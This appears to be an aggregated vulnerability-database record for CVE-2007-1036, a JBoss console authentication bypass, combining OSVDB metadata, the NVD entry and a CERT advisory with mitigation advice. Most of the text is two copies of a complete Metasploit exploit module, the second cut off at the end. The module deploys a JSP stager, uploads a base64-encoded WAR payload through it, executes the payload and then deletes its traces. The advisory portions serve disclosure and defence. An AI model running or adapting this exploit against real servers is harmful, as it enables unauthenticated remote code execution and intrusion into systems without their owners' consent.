ID OSVDB:33744
Type osvdb
Reporter OSVDB
Modified 2007-02-20T04:24:34
Description
No description provided by the source
References:
Security Tracker: 1017677
Other Advisory URL: http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss
Other Advisory URL: http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0347.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0356.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0377.html
ISS X-Force ID: 32596
CVE-2007-1036
CERT VU: 632656
{"href": "https://vulners.com/osvdb/OSVDB:33744", "id": "OSVDB:33744", "reporter": "OSVDB", "published": "2007-02-20T04:24:34", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1017677\nOther Advisory URL: http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss\nOther Advisory URL: http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0347.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0356.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0377.html\nISS X-Force ID: 32596\n[CVE-2007-1036](https://vulners.com/cve/CVE-2007-1036)\nCERT VU: 632656\n", "title": "JBoss Console / Web Management Direct Request Authentication Bypass", "lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "references": [], "edition": 1, "cvelist": ["CVE-2007-1036"], "affectedSoftware": [], "viewCount": 13, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2017-04-28T13:20:30", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1036"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/JBOSS_INVOKE_DEPLOY", "MSF:EXPLOIT/MULTI/HTTP/JBOSS_MAINDEPLOYER"]}, {"type": "exploitdb", "idList": ["EDB-ID:21080", "EDB-ID:16318"]}, {"type": "cert", "idList": ["VU:632656"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142595"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116241"]}, {"type": "nessus", "idList": ["JMXINVOKERSERVLET_EJBINVOKERSERVLET_RCE.NASL", "CISCO_PRIME_DCNM_6_1_2_LOCAL.NASL", "CISCO_PRIME_DCNM_6_1_2.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7280"]}], "modified": "2017-04-28T13:20:30", "rev": 2}, "vulnersScore": 7.2}, "modified": "2007-02-20T04:24:34"}
{"cve": [{"lastseen": "2020-10-03T11:45:49", "description": "The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.", "edition": 3, "cvss3": {}, "published": "2007-02-21T11:28:00", "title": "CVE-2007-1036", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036"], "modified": "2018-10-16T16:36:00", "cpe": ["cpe:/a:jboss:jboss_application_server:*"], "id": "CVE-2007-1036", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1036", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jboss:jboss_application_server:*:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:25:15", "description": "", "published": "2012-09-05T00:00:00", "type": "packetstorm", "title": "JBoss DeploymentFileRepository WAR Deployment", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1036"], "modified": "2012-09-05T00:00:00", "id": "PACKETSTORM:116241", "href": "https://packetstormsecurity.com/files/116241/JBoss-DeploymentFileRepository-WAR-Deployment.html", "sourceData": "`require 'msf/core' \n \n \nclass Metasploit4 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /JBoss/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)', \n'Description' => %q{ \nThis module can be used to execute a payload on JBoss servers that have an \nexposed HTTPAdaptor's JMX Invoker exposed on the \"JMXInvokerServlet\". By invoking \nthe methods provided by jboss.admin:DeploymentFileRepository a stager is deployed \nto finally upload the selected payload to the target. The DeploymentFileRepository \nmethods are only available on Jboss 4.x and 5.x. \n}, \n'Author' => [ \n'Patrick Hof', # Vulnerability discovery, analysis and PoC \n'Jens Liebchen', # Vulnerability discovery, analysis and PoC \n'h0ng10' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2007-1036' ], \n[ 'OSVDB', '33744' ], \n[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ], \n], \n'DisclosureDate' => 'Feb 20 2007', \n'Privileged' => true, \n'Platform' => ['java', 'win', 'linux' ], \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'Targets' => \n[ \n \n# do target detection but java meter by default \n[ 'Automatic', \n{ \n'Arch' => ARCH_JAVA, \n'Platform' => 'java' \n} \n], \n \n[ 'Java Universal', \n{ \n'Arch' => ARCH_JAVA, \n}, \n], \n \n# \n# Platform specific targets \n# \n[ 'Windows Universal', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'win' \n}, \n], \n \n[ 'Linux x86', \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux' \n}, \n], \n], \n \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]), \nOptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]), \nOptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]), \n], self.class) \n \nend \n \ndef check \nres = send_serialized_request('version.bin') \nif (res.nil?) or (res.code != 200) \nprint_error(\"Unable to request version, returned http code is: #{res.code.to_s}\") \nreturn Exploit::CheckCode::Unknown \nend \n \n# Check if the version is supported by this exploit \nreturn Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/ \nreturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/ \nreturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/ \n \nif res.body =~ /ServletException/ # Simple check, if we caused an exception. \nprint_status(\"Target seems vulnerable, but the used JBoss version is not supported by this exploit\") \nreturn Exploit::CheckCode::Appears \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nmytarget = target \n \nif (target.name =~ /Automatic/) \nmytarget = auto_target \nfail_with(\"Unable to automatically select a target\") if not mytarget \nprint_status(\"Automatically selected target: \\\"#{mytarget.name}\\\"\") \nelse \nprint_status(\"Using manually select target: \\\"#{mytarget.name}\\\"\") \nend \n \n \n# We use a already serialized stager to deploy the final payload \nregex_stager_app_base = rand_text_alpha(14) \nregex_stager_jsp_name = rand_text_alpha(14) \nname_parameter = rand_text_alpha(8) \ncontent_parameter = rand_text_alpha(8) \nstager_uri = \"/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp\" \nstager_code = \"A\" * 810 # 810 is the size of the stager in the serialized request \n \nreplace_values = { \n'regex_app_base' => regex_stager_app_base, \n'regex_jsp_name' => regex_stager_jsp_name, \nstager_code => generate_stager(name_parameter, content_parameter) \n} \n \nprint_status(\"Deploying stager\") \nsend_serialized_request('installstager.bin', replace_values) \nprint_status(\"Calling stager: #{stager_uri}\") \ncall_uri_mtimes(stager_uri, 5, 'GET') \n \n# Generate the WAR with the payload which will be uploaded through the stager \napp_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) \njsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) \n \nwar_data = payload.encoded_war({ \n:app_name => app_base, \n:jsp_name => jsp_name, \n:arch => mytarget.arch, \n:platform => mytarget.platform \n}).to_s \n \nb64_war = Rex::Text.encode_base64(war_data) \nprint_status(\"Uploading payload through stager\") \nres = send_request_cgi({ \n'uri' => stager_uri, \n'method' => \"POST\", \n'vars_post' => \n{ \nname_parameter => app_base, \ncontent_parameter => b64_war \n} \n}, 20) \n \npayload_uri = \"/#{app_base}/#{jsp_name}.jsp\" \nprint_status(\"Calling payload: \" + payload_uri) \nres = call_uri_mtimes(payload_uri,5, 'GET') \n \n# Remove the payload through stager \nprint_status(\"Removing payload through stager\") \ndelete_payload_uri = stager_uri + \"?#{name_parameter}=#{app_base}\" \nres = send_request_cgi( \n{'uri' => delete_payload_uri, \n}) \n \n# Remove the stager \nprint_status(\"Removing stager\") \nsend_serialized_request('removestagerfile.bin', replace_values) \nsend_serialized_request('removestagerdirectory.bin', replace_values) \n \nhandler \nend \n \ndef generate_stager(name_param, content_param) \nwar_file = rand_text_alpha(4+rand(4)) \nfile_content = rand_text_alpha(4+rand(4)) \njboss_home = rand_text_alpha(4+rand(4)) \ndecoded_content = rand_text_alpha(4+rand(4)) \npath = rand_text_alpha(4+rand(4)) \nfos = rand_text_alpha(4+rand(4)) \nname = rand_text_alpha(4+rand(4)) \nfile = rand_text_alpha(4+rand(4)) \n \nstager_script = <<-EOT \n<%@page import=\"java.io.*, \njava.util.*, \nsun.misc.BASE64Decoder\" \n%> \n<% \nString #{file_content} = \"\"; \nString #{war_file} = \"\"; \nString #{jboss_home} = System.getProperty(\"jboss.server.home.dir\"); \nif (request.getParameter(\"#{content_param}\") != null){ \ntry { \n#{file_content} = request.getParameter(\"#{content_param}\"); \n#{war_file} = request.getParameter(\"#{name_param}\"); \nbyte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content}); \nString #{path} = #{jboss_home} + \"/deploy/\" + #{war_file} + \".war\"; \nFileOutputStream #{fos} = new FileOutputStream(#{path}); \n#{fos}.write(#{decoded_content}); \n#{fos}.close(); \n} \ncatch(Exception e) {} \n} \nelse { \ntry{ \nString #{name} = request.getParameter(\"#{name_param}\"); \nString #{file} = #{jboss_home} + \"/deploy/\" + #{name} + \".war\"; \nnew File(#{file}).delete(); \n} \ncatch(Exception e) {} \n} \n \n%> \nEOT \n \n# The script must be exactly 810 characters long, otherwise we might have serialization issues \n# Therefore we fill the rest wit spaces \nspaces = \" \" * (810 - stager_script.length) \nstager_script << spaces \nend \n \n \ndef send_serialized_request(file_name , replace_params = {}) \npath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"jboss_jmxinvoker\", \"DeploymentFileRepository\", file_name) \ndata = File.open( path, \"rb\" ) { |fd| data = fd.read(fd.stat.size) } \n \nreplace_params.each { |key, value| data.gsub!(key, value) } \n \nres = send_request_cgi({ \n'uri' => target_uri.path, \n'method' => 'POST', \n'data' => data, \n'headers' => \n{ \n'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation', \n'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' \n} \n}, 25) \n \n \nif (not res) or (res.code != 200) \nprint_error(\"Failed: Error requesting preserialized request #{file_name}\") \nreturn nil \nend \n \nres \nend \n \n \ndef call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil) \n# JBoss might need some time for the deployment. Try 5 times at most and \n# wait 5 seconds inbetween tries \nnum_attempts.times do |attempt| \nif (verb == \"POST\") \nres = send_request_cgi( \n{ \n'uri' => uri, \n'method' => verb, \n'data' => data \n}, 5) \nelse \nuri += \"?#{data}\" unless data.nil? \nres = send_request_cgi( \n{ \n'uri' => uri, \n'method' => verb \n}, 30) \nend \n \nmsg = nil \nif (!res) \nmsg = \"Execution failed on #{uri} [No Response]\" \nelsif (res.code < 200 or res.code >= 300) \nmsg = \"http request failed to #{uri} [#{res.code}]\" \nelsif (res.code == 200) \nprint_status(\"Successfully called '#{uri}'\") if datastore['VERBOSE'] \nreturn res \nend \n \nif (attempt < num_attempts - 1) \nmsg << \", retrying in 5 seconds...\" \nprint_status(msg) if datastore['VERBOSE'] \nselect(nil, nil, nil, 5) \nelse \nprint_error(msg) \nreturn res \nend \nend \nend \n \n \ndef auto_target \nprint_status(\"Attempting to automatically select a target\") \n \nplat = detect_platform() \narch = detect_architecture() \n \nreturn nil if (not arch or not plat) \n \n# see if we have a match \ntargets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) } \n \n# no matching target found \nreturn nil \nend \n \n \n# Try to autodetect the target platform \ndef detect_platform \nprint_status(\"Attempting to automatically detect the platform\") \nres = send_serialized_request(\"osname.bin\") \n \nif (res.body =~ /(Linux|FreeBSD|Windows)/i) \nos = $1 \nif (os =~ /Linux/i) \nreturn 'linux' \nelsif (os =~ /FreeBSD/i) \nreturn 'linux' \nelsif (os =~ /Windows/i) \nreturn 'win' \nend \nend \nnil \nend \n \n \n# Try to autodetect the architecture \ndef detect_architecture() \nprint_status(\"Attempting to automatically detect the architecture\") \nres = send_serialized_request(\"osarch.bin\") \nif (res.body =~ /(i386|x86)/i) \narch = $1 \nif (arch =~ /i386|x86/i) \nreturn ARCH_X86 \n# TODO, more \nend \nend \nnil \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/116241/jboss_invoke_deploy.rb.txt"}], "cert": [{"lastseen": "2020-09-18T20:42:50", "bulletinFamily": "info", "cvelist": ["CVE-2007-1036"], "description": "### Overview \n\nThe JBoss Application Server may allow unauthenticated, remote access to the administrative console.\n\n### Description \n\n[JBoss](<http://www.jboss.com/>) is an open source application server implemented in Java. Because it is Java-based, JBoss can be used on any operating system that supports Java. JBoss servers can be remotely managed through a web-based administrative interface.\n\nIf JBoss is installed without using the advanced installer options, the JBoss [security features](<http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss>) will need to be configured manually. If a JBoss server is configured to allow unauthenticated access to the administrative interface, and is accessible from a remote network, then an attacker may be able to access and modify data on the server. \n \nNote that it may be possible to enumerate vulnerable servers by using search engines. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to gain administrative access to a JBoss Application Server. Once an attacker has access, they may be able to access and modify data on that server. \n \n--- \n \n### Solution \n\n**Use the installer** \nUsing the advanced installer options will configure JBoss to only allow authenticated administrative access. \n \n--- \n \n \n**Enable role based security** \n \nEnabling role based security may mitigate this vulnerability. See the [SecureTheJmxConsole](<http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole>) page on the JBoss wiki for more information. \n \n**Restrict access** \n \nRestricting access to the administrative interface to trusted hosts may mitigate this vulnerability. See the [LimitAccessToCertainClients](<http://wiki.jboss.org/wiki/Wiki.jsp?page=LimitAccessToCertainClients>) page on the JBoss wiki for more information. \n \n--- \n \n### Vendor Information\n\n632656\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Red Hat, Inc. __ Affected\n\nUpdated: February 21, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe JBoss AS console manager should always be secured prior to deployment, as directed in the JBoss Application Server Guide and release notes. By default, the JBoss AS installer gives users the ability to password protect the console manager. If the user did not use the installer, the raw JBoss services will be in a completely unconfigured state and these steps should be performed manually:\n\n<http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureTheJmxConsole>\n * <http://wiki.jboss.org/wiki/Wiki.jsp?page=LimitAccessToCertainClients>\n * <http://www.jboss.com/>\n * <http://wiki.jboss.org/wiki/Wiki.jsp?page=SecureJBoss>\n * <http://archives.neohapsis.com/archives/bugtraq/2007-02/0347.html>\n\n### Acknowledgements\n\nThis vulnerability was reported by Ben Dexter.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-1036](<http://web.nvd.nist.gov/vuln/detail/CVE-2007-1036>) \n---|--- \n**Severity Metric:** | 2.25 \n**Date Public:** | 2007-02-20 \n**Date First Published:** | 2007-02-20 \n**Date Last Updated: ** | 2007-02-21 22:50 UTC \n**Document Revision: ** | 32 \n", "modified": "2007-02-21T22:50:00", "published": "2007-02-20T00:00:00", "id": "VU:632656", "href": "https://www.kb.cert.org/vuls/id/632656", "type": "cert", "title": "JBoss Application Server may not properly restrict access to the administrative interface", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T15:38:09", "description": "JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet). CVE-2007-1036. Remote exploits for multiple platform", "published": "2012-09-05T00:00:00", "type": "exploitdb", "title": "JBoss DeploymentFileRepository WAR Deployment via JMXInvokerServlet", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1036"], "modified": "2012-09-05T00:00:00", "id": "EDB-ID:21080", "href": "https://www.exploit-db.com/exploits/21080/", "sourceData": "require 'msf/core'\r\n\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tHttpFingerprint = { :pattern => [ /JBoss/ ] }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module can be used to execute a payload on JBoss servers that have an\r\n\t\t\t\texposed HTTPAdaptor's JMX Invoker exposed on the \"JMXInvokerServlet\". By invoking\r\n\t\t\t\tthe methods provided by jboss.admin:DeploymentFileRepository a stager is deployed\r\n\t\t\t\tto finally upload the selected payload to the target. The DeploymentFileRepository\r\n\t\t\t\tmethods are only available on Jboss 4.x and 5.x.\r\n\t\t\t},\r\n\t\t\t'Author' => [\r\n\t\t\t\t'Patrick Hof', # Vulnerability discovery, analysis and PoC\r\n\t\t\t\t'Jens Liebchen', # Vulnerability discovery, analysis and PoC\r\n\t\t\t\t'h0ng10' # Metasploit module\r\n\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-1036' ],\r\n\t\t\t\t\t[ 'OSVDB', '33744' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 20 2007',\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Platform' => ['java', 'win', 'linux' ],\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Aggressive,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t# do target detection but java meter by default\r\n\t\t\t\t\t[ 'Automatic',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t\t'Platform' => 'java'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Java Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_JAVA,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# Platform specific targets\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'win'\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Linux x86',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Arch' => ARCH_X86,\r\n\t\t\t\t\t\t\t'Platform' => 'linux'\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(8080),\r\n\t\t\t\t\tOptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),\r\n\t\t\t\t\tOptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),\r\n\t\t\t\t\tOptString.new('TARGETURI', [ true, 'The URI path of the invoker servlet', '/invoker/JMXInvokerServlet' ]),\r\n\t\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef check\r\n\t\tres = send_serialized_request('version.bin')\r\n\t\tif (res.nil?) or (res.code != 200)\r\n\t\t\tprint_error(\"Unable to request version, returned http code is: #{res.code.to_s}\")\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\t# Check if the version is supported by this exploit\r\n\t\treturn Exploit::CheckCode::Vulnerable if res.body =~ /CVSTag=Branch_4_/\r\n\t\treturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_4_/\r\n\t\treturn Exploit::CheckCode::Vulnerable if res.body =~ /SVNTag=JBoss_5_/\r\n\r\n\t\tif res.body =~ /ServletException/\t# Simple check, if we caused an exception.\r\n\t\t\tprint_status(\"Target seems vulnerable, but the used JBoss version is not supported by this exploit\")\r\n\t\t\treturn Exploit::CheckCode::Appears\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tmytarget = target\r\n\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tmytarget = auto_target\r\n\t\t\tfail_with(\"Unable to automatically select a target\") if not mytarget\r\n\t\t\tprint_status(\"Automatically selected target: \\\"#{mytarget.name}\\\"\")\r\n\t\telse\r\n\t\t\tprint_status(\"Using manually select target: \\\"#{mytarget.name}\\\"\")\r\n\t\tend\r\n\r\n\r\n\t\t# We use a already serialized stager to deploy the final payload\r\n\t\tregex_stager_app_base = rand_text_alpha(14)\r\n\t\tregex_stager_jsp_name = rand_text_alpha(14)\r\n\t\tname_parameter = rand_text_alpha(8)\r\n\t\tcontent_parameter = rand_text_alpha(8)\r\n\t\tstager_uri = \"/#{regex_stager_app_base}/#{regex_stager_jsp_name}.jsp\"\r\n\t\tstager_code = \"A\" * 810\t\t# 810 is the size of the stager in the serialized request\r\n\r\n\t\treplace_values = {\r\n\t\t\t'regex_app_base' => regex_stager_app_base,\r\n\t\t\t'regex_jsp_name' => regex_stager_jsp_name,\r\n\t\t\tstager_code => generate_stager(name_parameter, content_parameter)\r\n\t\t}\r\n\r\n\t\tprint_status(\"Deploying stager\")\r\n\t\tsend_serialized_request('installstager.bin', replace_values)\r\n\t\tprint_status(\"Calling stager: #{stager_uri}\")\r\n\t\tcall_uri_mtimes(stager_uri, 5, 'GET')\r\n\r\n\t\t# Generate the WAR with the payload which will be uploaded through the stager\r\n\t\tapp_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))\r\n\t\tjsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))\r\n\r\n\t\twar_data = payload.encoded_war({\r\n\t\t\t:app_name => app_base,\r\n\t\t\t:jsp_name => jsp_name,\r\n\t\t\t:arch => mytarget.arch,\r\n\t\t\t:platform => mytarget.platform\r\n\t\t}).to_s\r\n\r\n\t\tb64_war = Rex::Text.encode_base64(war_data)\r\n\t\tprint_status(\"Uploading payload through stager\")\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => stager_uri,\r\n\t\t\t'method' => \"POST\",\r\n\t\t\t'vars_post' =>\r\n\t\t\t{\r\n\t\t\t\tname_parameter => app_base,\r\n\t\t\t\tcontent_parameter => b64_war\r\n\t\t\t}\r\n\t\t}, 20)\r\n\r\n\t\tpayload_uri = \"/#{app_base}/#{jsp_name}.jsp\"\r\n\t\tprint_status(\"Calling payload: \" + payload_uri)\r\n\t\tres = call_uri_mtimes(payload_uri,5, 'GET')\r\n\r\n\t\t# Remove the payload through stager\r\n\t\tprint_status(\"Removing payload through stager\")\r\n\t\tdelete_payload_uri = stager_uri + \"?#{name_parameter}=#{app_base}\"\r\n\t\tres = send_request_cgi(\r\n\t\t\t{'uri' => delete_payload_uri,\r\n\t\t})\r\n\r\n\t\t# Remove the stager\r\n\t\tprint_status(\"Removing stager\")\r\n\t\tsend_serialized_request('removestagerfile.bin', replace_values)\r\n\t\tsend_serialized_request('removestagerdirectory.bin', replace_values)\r\n\r\n\t\thandler\r\n\tend\r\n\r\n\tdef generate_stager(name_param, content_param)\r\n\t\twar_file = rand_text_alpha(4+rand(4))\r\n\t\tfile_content = rand_text_alpha(4+rand(4))\r\n\t\tjboss_home = rand_text_alpha(4+rand(4))\r\n\t\tdecoded_content = rand_text_alpha(4+rand(4))\r\n\t\tpath = rand_text_alpha(4+rand(4))\r\n\t\tfos = rand_text_alpha(4+rand(4))\r\n\t\tname = rand_text_alpha(4+rand(4))\r\n\t\tfile = rand_text_alpha(4+rand(4))\r\n\r\n\t\tstager_script = <<-EOT\r\n<%@page import=\"java.io.*,\r\n\t\tjava.util.*,\r\n\t\tsun.misc.BASE64Decoder\"\r\n%>\r\n<%\r\nString #{file_content} = \"\";\r\nString #{war_file} = \"\";\r\nString #{jboss_home} = System.getProperty(\"jboss.server.home.dir\");\r\nif (request.getParameter(\"#{content_param}\") != null){\r\ntry {\r\n#{file_content} = request.getParameter(\"#{content_param}\");\r\n#{war_file} = request.getParameter(\"#{name_param}\");\r\nbyte[] #{decoded_content} = new BASE64Decoder().decodeBuffer(#{file_content});\r\nString #{path} = #{jboss_home} + \"/deploy/\" + #{war_file} + \".war\";\r\nFileOutputStream #{fos} = new FileOutputStream(#{path});\r\n#{fos}.write(#{decoded_content});\r\n#{fos}.close();\r\n}\r\ncatch(Exception e) {}\r\n}\r\nelse {\r\ntry{\r\nString #{name} = request.getParameter(\"#{name_param}\");\r\nString #{file} = #{jboss_home} + \"/deploy/\" + #{name} + \".war\";\r\nnew File(#{file}).delete();\r\n}\r\ncatch(Exception e) {}\r\n}\r\n\r\n%>\r\nEOT\r\n\r\n\t# The script must be exactly 810 characters long, otherwise we might have serialization issues\r\n\t# Therefore we fill the rest wit spaces\r\n\tspaces = \" \" * (810 - stager_script.length)\r\n\tstager_script << spaces\r\n\tend\r\n\r\n\r\n\tdef send_serialized_request(file_name , replace_params = {})\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"jboss_jmxinvoker\", \"DeploymentFileRepository\", file_name)\r\n\t\tdata = File.open( path, \"rb\" ) { |fd| data = fd.read(fd.stat.size) }\r\n\r\n\t\treplace_params.each { |key, value| data.gsub!(key, value) }\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => target_uri.path,\r\n\t\t\t'method' => 'POST',\r\n\t\t\t'data' => data,\r\n\t\t\t'headers' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ContentType:' => 'application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation',\r\n\t\t\t\t\t'Accept' => 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2'\r\n\t\t\t\t}\r\n\t\t}, 25)\r\n\r\n\r\n\t\tif (not res) or (res.code != 200)\r\n\t\t\tprint_error(\"Failed: Error requesting preserialized request #{file_name}\")\r\n\t\t\treturn nil\r\n\t\tend\r\n\r\n\t\tres\r\n\tend\r\n\r\n\r\n\tdef call_uri_mtimes(uri, num_attempts = 5, verb = nil, data = nil)\r\n\t\t# JBoss might need some time for the deployment. Try 5 times at most and\r\n\t\t# wait 5 seconds inbetween tries\r\n\t\tnum_attempts.times do |attempt|\r\n\t\t\tif (verb == \"POST\")\r\n\t\t\t\tres = send_request_cgi(\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'uri' => uri,\r\n\t\t\t\t\t\t'method' => verb,\r\n\t\t\t\t\t\t'data' => data\r\n\t\t\t\t\t}, 5)\r\n\t\t\telse\r\n\t\t\t\turi += \"?#{data}\" unless data.nil?\r\n\t\t\t\tres = send_request_cgi(\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'uri' => uri,\r\n\t\t\t\t\t\t'method' => verb\r\n\t\t\t\t\t}, 30)\r\n\t\t\tend\r\n\r\n\t\t\tmsg = nil\r\n\t\t\tif (!res)\r\n\t\t\t\tmsg = \"Execution failed on #{uri} [No Response]\"\r\n\t\t\telsif (res.code < 200 or res.code >= 300)\r\n\t\t\t\tmsg = \"http request failed to #{uri} [#{res.code}]\"\r\n\t\t\telsif (res.code == 200)\r\n\t\t\t\tprint_status(\"Successfully called '#{uri}'\") if 